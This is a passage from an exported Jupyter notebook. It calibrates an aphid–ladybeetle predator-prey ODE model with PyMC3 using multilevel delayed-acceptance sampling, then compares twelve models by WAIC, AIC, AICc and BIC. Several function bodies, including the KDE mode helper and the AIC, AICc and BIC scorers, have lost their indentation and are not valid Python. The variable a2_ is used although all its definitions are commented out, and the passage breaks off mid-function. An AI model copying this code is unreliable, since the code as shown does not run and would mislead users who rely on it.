    qoi1_series, qoi2_series = solution.y
    return np.vstack([qoi1_series, qoi2_series]).T
# In[ ]:
# Observations cast to float64 and stacked as (n_times, 2) for the likelihood.
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T  # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
# Uniform priors span +/-95% around the deterministic estimates.
percent_calibration = 0.95
# Fine (full-resolution) model for MLDA: uses every observation point.
with pm.Model() as fine_model_AP3:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)  # r1 held fixed at its deterministic estimate
    r2_ = pm.Uniform(
        "r2",
        lower=(1.0 - percent_calibration) * r2,
        upper=(1.0 + percent_calibration) * r2,
    )
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + percent_calibration) * r3,
    )
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # a1_ = pm.Data("a1", a1)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    # a2_ = pm.Data("a2", a2)
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)  # a3 held fixed at its deterministic estimate
    # Priors for Initial Conditions (held fixed via pm.Data)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP3_model",
        AP3_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse model 1 for MLDA: subsamples every 4th observation to make the
# likelihood cheaper to evaluate during delayed-acceptance screening.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters (mirror fine_model_AP3)
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    r2_ = pm.Uniform(
        "r2",
        lower=(1.0 - percent_calibration) * r2,
        upper=(1.0 + percent_calibration) * r2,
    )
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + percent_calibration) * r3,
    )
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # a1_ = pm.Data("a1", a1)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    # a2_ = pm.Data("a2", a2)
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)
    # Priors for Initial Conditions (held fixed via pm.Data)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP3_model",
        AP3_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse model 2: subsamples every 2nd observation (finer than coarse_model_1).
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters (mirror fine_model_AP3)
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    r2_ = pm.Uniform(
        "r2",
        lower=(1.0 - percent_calibration) * r2,
        upper=(1.0 + percent_calibration) * r2,
    )
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + percent_calibration) * r3,
    )
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # a1_ = pm.Data("a1", a1)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    # a2_ = pm.Data("a2", a2)
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)
    # Priors for Initial Conditions (held fixed via pm.Data)
    u0, v0 = y0
    # NOTE(review): lower=0 here, but the fine model and coarse_model_1 use
    # lower=1 for std_deviation -- confirm whether this asymmetry is intended.
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP3_model",
        AP3_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
with fine_model_AP3:
    # NOTE(review): only coarse_model_1 is passed to MLDA; coarse_model_2
    # above is built but not used here -- confirm whether that is intended.
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_AP3 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[ ]:
# Quick visual check of the r2 posterior.
plt.hist(trace_calibration_AP3['r2'], bins=35)
plt.show()
# In[ ]:
# Variables that were actually sampled (the rest are held fixed via pm.Data).
calibration_variable_names = [
    "std_deviation",
    "r2",
    "r3",
    "a1",  # changed a3 with a1
]
# In[ ]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
    pm.plot_posterior(
        trace_calibration_AP3[::plot_step],
        var_names=(f"{variable}"),
        kind="hist",
        round_to=4,
        point_estimate="mode"
    )
    plt.savefig(f"img/{variable}_posterior_cal_AP3.png")
# In[ ]:
az.plot_pair(
    trace_calibration_AP3,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_AP3.png")
# In[ ]:
df_stats_summary = az.summary(
    data=trace_calibration_AP3,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15,  # floating-point rounding in the summary
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the Most Probable Value (KDE mode) for each posterior variable.

    Vector-valued variables are handled per dimension and keyed as
    ``"name[dim]"`` in the returned dictionary.
    """
    mpv_by_name = dict()
    progress = tqdm(variable_names)
    for name in progress:
        progress.set_description(f"Calculating MPV from KDE for {name}")
        realizations = pm_trace[f"{name}"]
        try:
            num_of_dimensions = realizations.shape[1]
        except IndexError:
            num_of_dimensions = 0
        if num_of_dimensions == 0:
            mpv_by_name[f"{name}"] = _scalar_rv_mvp_estimation(realizations)
        else:
            for dim in range(num_of_dimensions):
                column = np.array(realizations[:, dim])
                mpv_by_name[f"{name}[{dim}]"] = _scalar_rv_mvp_estimation(column)
    return mpv_by_name
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of an ArviZ stats summary with an extra ``mpv`` column.

    Keys of ``rv_modes_dict`` must match the summary index; the input frame
    is not modified.
    """
    summary_with_mpv = arviz_summary.copy()
    summary_with_mpv["mpv"] = pd.Series(
        data=list(rv_modes_dict.values()), index=list(rv_modes_dict.keys())
    )
    return summary_with_mpv
# In[ ]:
# Append the KDE-based Most Probable Value to the ArviZ summary and persist it.
calibration_variable_mpv = calculate_rv_posterior_mpv(
    pm_trace=trace_calibration_AP3, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_AP3.csv")  # save to a CSV for later reference
df_stats_summary
# In[ ]:
# 95% credible band (2.5th-97.5th percentiles) and median trajectory.
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_AP3["AP3_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_AP3["AP3_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_AP3["AP3_model"], 50, axis=0)
# In[ ]:
plt.figure(figsize=(15, 5))
plt.plot(
    time_observations,
    y_fit[:, 0],
    "r",
    label="Aphids (simulated)",
    marker="X",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
    time_observations,
    y_fit[:, 1],
    "b",
    label="Ladybeetles (simulated)",
    marker="o",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
    time_observations,
    aphid_observed.Density.values,
    label="Aphids data",
    marker="s",
    linestyle="",
    markersize=10
)
plt.plot(
    time_observations,
    ladybeetle_observed.Density.values,
    label="Ladybeetles data",
    marker="v",
    linestyle="",
    markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_AP3.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict()  # also store the realizations in a Python dict
# Skip the first entry ("std_deviation"): only model parameters are exported.
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
    progress_bar.set_description(f"Gathering {variable} realizations")
    parameter_realization = trace_calibration_AP3.get_values(f"{variable}")
    dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_AP3.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# In[ ]:
# In[ ]:
# In[ ]:
# # Model comparison/selection
# ## From PyMC3
#
# Check [this example](https://docs.pymc.io/pymc-examples/examples/diagnostics_and_criticism/model_comparison.html) for further information.
#
# TL;DR: The "score", which is "loo" or "waic" in the printed dataframe bellow, should the greatest for the best model. The `weight` is one of the most important information, because it loosely tell the probability of the model to be the "correct one" among all the compared models.
# In[ ]:
print("\n*** Performing model comparison ***")
start_time = time.time()
# All twelve calibrated model traces compared at once.
models_to_compare = {
    "CP1": trace_calibration_CP1,
    "CP2": trace_calibration_CP2,
    "CP3": trace_calibration_CP3,
    "EP1": trace_calibration_EP1,
    "EP2": trace_calibration_EP2,
    "EP3": trace_calibration_EP3,
    "LP1": trace_calibration_LP1,
    "LP2": trace_calibration_LP2,
    "LP3": trace_calibration_LP3,
    "AP1": trace_calibration_AP1,
    "AP2": trace_calibration_AP2,
    "AP3": trace_calibration_AP3,
}
# Choose ic='loo' or ic='waic'
df_model_comparison = pm.compare(
    models_to_compare,
    ic='waic',
    method='BB-pseudo-BMA',
    b_samples=3000,
    seed=seed
)
duration = time.time() - start_time
print(f"-- Model comparison done in {duration / 60:.3f} minutes")
df_model_comparison
# In[ ]:
az.plot_compare(df_model_comparison, figsize=(12, 4), insample_dev=False)
plt.show()
# ## Custom (and basic) information criteria
#
# The criteria employed here are:
#
# * AIC -- Akaike Information Criterion
# * BIC -- Bayesian Information Criterion
#
# Both ICs are based on the residual of least squares. This approach has as hypothesis that the error residuals, i.e., $\sum_{i = 1}^n (y^{\text{obs}}_i - y^{\text{model}}_i)^2$, are independent identical normal, with zero mean.
#
# An auxiliary quantity is defined in order to compare the models (relative to the best one):
#
# \begin{equation}
# \mathcal{L}^{\text{rel}}_i := \exp{\left(\frac{\text{IC}_{\text{min}} - \text{IC}_i}{2}\right)}
# \end{equation}
#
# where $\text{IC}_i$ is the information criterion value (it can be AIC or BIC) for the $i$th model, and $\text{IC}_{\text{min}}$ is the minimum (i.e., the best model) information criterion value from the set of compared models.
#
# This auxiliary quantity is known as "relative likelihood". It is proportional to the probability that the $i$th model minimizes the information loss. For the best model, this value will be always equal to 1.
# In[ ]:
def calculate_aic_score(trace, rv_model_name, num_of_parameters, observations):
u_observed, v_observed = observations.T
k = num_of_parameters
n = observations.shape[0]
aic_scores = list()
progress_bar = tqdm(trace[rv_model_name])
for model_realization in progress_bar:
progress_bar.set_description(f"Calculating AIC for {rv_model_name}")
u_realization, v_realization = model_realization.T
u_realization_residual = u_observed - u_realization
v_realization_residual = v_observed - v_realization
u_residual_sum_of_squares = np.sum(u_realization_residual * u_realization_residual)
v_residual_sum_of_squares = np.sum(v_realization_residual * v_realization_residual)
total_residual_sum_of_squares = u_residual_sum_of_squares + v_residual_sum_of_squares
# Information criterion in terms of least-squares error residuals
realization_aic_score = 2 * k + n * np.log(total_residual_sum_of_squares)
aic_scores.append(realization_aic_score)
aic_scores = np.array(aic_scores)
return aic_scores
def calculate_aicc_score(trace, rv_model_name, num_of_parameters, observations):
u_observed, v_observed = observations.T
k = num_of_parameters
n = observations.shape[0]
aic_scores = list()
progress_bar = tqdm(trace[rv_model_name])
for model_realization in progress_bar:
progress_bar.set_description(f"Calculating AICc for {rv_model_name}")
u_realization, v_realization = model_realization.T
u_realization_residual = u_observed - u_realization
v_realization_residual = v_observed - v_realization
u_residual_sum_of_squares = np.sum(u_realization_residual * u_realization_residual)
v_residual_sum_of_squares = np.sum(v_realization_residual * v_realization_residual)
total_residual_sum_of_squares = u_residual_sum_of_squares + v_residual_sum_of_squares
# Information criterion in terms of least-squares error residuals
realization_aic_score = 2 * k + n * np.log(total_residual_sum_of_squares)
realization_aic_score += 2 * (k * k + k) / (n - k - 1)
aic_scores.append(realization_aic_score)
aic_scores = np.array(aic_scores)
return aic_scores
def calculate_bic_score(trace, rv_model_name, num_of_parameters, observations):
u_observed, v_observed = observations.T
k = num_of_parameters
n = observations.shape[0]
bic_scores = list()
progress_bar = tqdm(trace[rv_model_name])
for model_realization in progress_bar:
progress_bar.set_description(f"Calculating BIC for {rv_model_name}")
u_realization, v_realization = model_realization.T
u_realization_residual = u_observed - u_realization
v_realization_residual = v_observed - v_realization
u_residual_sum_of_squares = np.sum(u_realization_residual * u_realization_residual)
v_residual_sum_of_squares = np.sum(v_realization_residual * v_realization_residual)
total_residual_sum_of_squares = u_residual_sum_of_squares + v_residual_sum_of_squares
# Information criterion in terms of least-squares error residuals
realization_bic_score = k * np.log(n) + n * np.log(total_residual_sum_of_squares / n)
bic_scores.append(realization_bic_score)
bic_scores = np.array(bic_scores)
return bic_scores
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_CP1, 'CP1_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_CP1, 'CP1_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_CP1, 'CP1_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_CP2, 'CP2_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_CP2, 'CP2_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_CP2, 'CP2_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_CP3, 'CP3_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_CP3, 'CP3_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_CP3, 'CP3_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_EP1, 'EP1_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_EP1, 'EP1_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_EP1, 'EP1_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_EP2, 'EP2_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_EP2, 'EP2_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_EP2, 'EP2_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_EP3, 'EP3_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_EP3, 'EP3_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_EP3, 'EP3_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_LP1, 'LP1_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_LP1, 'LP1_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_LP1, 'LP1_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_LP2, 'LP2_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_LP2, 'LP2_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_LP2, 'LP2_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_LP3, 'LP3_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_LP3, 'LP3_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_LP3, 'LP3_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_AP1, 'AP1_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_AP1, 'AP1_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_AP1, 'AP1_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_AP2, 'AP2_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_AP2, 'AP2_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_AP2, 'AP2_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_AP3, 'AP3_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_AP3, 'AP3_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_AP3, 'AP3_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
# Now we define convenient functions to compare models according to the ICs.
# In[ ]:
def compare_aic(
models_to_compare: dict,
models_num_of_parameters: dict,
observations: np.ndarray
